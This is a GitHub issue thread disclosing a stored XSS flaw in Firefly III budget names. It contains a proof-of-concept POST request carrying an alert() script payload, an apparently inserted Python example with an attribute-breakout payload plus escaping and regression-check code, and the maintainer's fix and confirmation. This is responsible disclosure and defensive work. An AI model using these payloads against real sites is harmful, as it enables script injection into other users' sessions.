Stored XSS in budget name #2335

Closed

dayn1ne opened this issue Jul 15, 2019 · 7 comments
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).

Comments


dayn1ne commented Jul 15, 2019

Description
The current version of Firefly III, 4.7.17, is vulnerable to stored XSS due to a lack of filtering of user-supplied data in the budget name. A malicious attacker can create a specially crafted link which contains JavaScript code and assign it to a budget name. When a user who adds transactions with the malicious budget views the page with that transaction on the tag summary page (http://firefly.host/tags/show/$tag_number$), the malicious JavaScript code will be executed.

Steps to reproduce
I created a small video of the reproduction steps:
XSS Steps.zip

PoC

POST /budgets/store HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Cookie: firefly_session=<Your session here>;
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_token=<Your token here>=1&name=<script>alert("XSS PoC")</script>

(Attached screenshot: Screenshot 2019-07-15 at 17 18 30)
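The rendering flaw described in the report, as an added example that is not Firefly III's code: a constructed tag-page cell that prints the stored budget name raw, the same cell with output-time escaping, and a parser-based check of the kind a tester would use to confirm a fix (the rendered value must parse back to exactly the stored string, with no extra elements or attributes). The `<td>` markup and its `title` attribute are assumptions for illustration; the example also goes beyond the report by including a constructed attribute-breakout payload, which a filter that only strips `<script>` would let through.

```python
# Added example, not Firefly III code. The <td> cell markup and its title
# attribute are constructed for illustration; the real templates are not
# reproduced here.
import html
from html.parser import HTMLParser

# First payload is the one from the PoC request; the second is a constructed
# attribute-breakout variant that a "strip <script>" filter would not catch.
PAYLOADS = [
    '<script>alert("XSS PoC")</script>',
    '" autofocus onfocus="alert(1)',
]


def render_budget_cell_unsafe(budget_name: str) -> str:
    """Vulnerable pattern: the stored name is interpolated raw into the
    tag summary markup, both as a text node and inside an attribute."""
    return f'<td title="{budget_name}">{budget_name}</td>'


def render_budget_cell_safe(budget_name: str) -> str:
    """Fixed pattern: escape at output time for the HTML context the value
    lands in. html.escape(quote=True) encodes < > & " and ', which covers
    both the text node and the double-quoted attribute."""
    safe = html.escape(budget_name, quote=True)
    return f'<td title="{safe}">{safe}</td>'


class _CellParser(HTMLParser):
    """Records what a browser-like parse makes of the rendered cell."""

    def __init__(self):
        super().__init__()
        self.tags = []       # every start tag seen, in order
        self.td_attrs = {}   # attributes of the <td> itself
        self.text = []       # text-node chunks (entities already decoded)

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "td":
            self.td_attrs = dict(attrs)

    def handle_data(self, data):
        self.text.append(data)


def renders_inert(render, budget_name: str) -> bool:
    """Regression check: the rendered cell must parse to exactly one <td>
    (no injected elements such as <script>) whose title attribute and text
    content both equal the stored name. Any other outcome means user data
    changed the document structure."""
    parser = _CellParser()
    parser.feed(render(budget_name))
    parser.close()
    return (
        parser.tags == ["td"]
        and parser.td_attrs.get("title") == budget_name
        and "".join(parser.text) == budget_name
    )


if __name__ == "__main__":
    for name in ["Groceries", *PAYLOADS]:
        print(f"{name!r:40} unsafe={renders_inert(render_budget_cell_unsafe, name)} "
              f"safe={renders_inert(render_budget_cell_safe, name)}")
```

The check deliberately parses the output rather than grepping for `<script>`: a name that survives as an extra attribute (the second payload) never contains a script tag at all, yet still executes. Escaping at the output point, for the context the value lands in, is what makes both payloads inert while leaving an ordinary name such as "Groceries" untouched.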

JC5 (Member) commented Jul 15, 2019

Thanks, nice find. I'll verify and push an update as soon as I can. You're mixing up tags and budgets by the way, is this correct?

JC5 (Member) commented Jul 15, 2019

Sorry, I see what you mean.

@JC5 JC5 closed this as completed in 45ddb64 Jul 15, 2019
JC5 (Member) commented Jul 15, 2019

I have pushed 4.7.17.1 that should fix the bug and a similar one in category names. The docker builds are running now. In my haste, I completely forgot to credit you which I will do in my release post and on reddit, after you confirm the issue is gone.

I've reopened the issue as GitHub has automatically closed it.

@JC5 JC5 reopened this Jul 15, 2019
@JC5 JC5 added the bug Verified and replicated bugs and issues. label Jul 15, 2019
dayn1ne (Author) commented Jul 15, 2019

I checked commit 45ddb64 and see only changes to versions in some files and changed titles in others.

But anyway, I got the source code from https://github.com/firefly-iii/firefly-iii/releases/tag/4.7.17.1 and installed it for checking.

The vulnerability still exists.

I uploaded the video to Dropbox: https://www.dropbox.com/s/gdr87bh4pat5ly5/xss_2.mov?dl=0

@JC5 JC5 closed this as completed in def3070 Jul 15, 2019
@JC5 JC5 reopened this Jul 15, 2019
JC5 (Member) commented Jul 15, 2019

You're right. I am an idiot. I pushed the correct fix in 4.7.17.2. Can you confirm?

dayn1ne (Author) commented Jul 15, 2019

Confirmed, I cannot reproduce the XSS.

Thank you for such a quick fix and for this wonderful budget app.
I will continue searching for security bugs and will inform you if I find any.

JC5 (Member) commented Jul 15, 2019

No problem, please do. You know where to find me!

@JC5 JC5 added the fixed Bugs that are fixed (in a coming release). label Jul 15, 2019
@JC5 JC5 closed this as completed Aug 3, 2019
@lock lock bot locked as resolved and limited conversation to collaborators Jan 19, 2020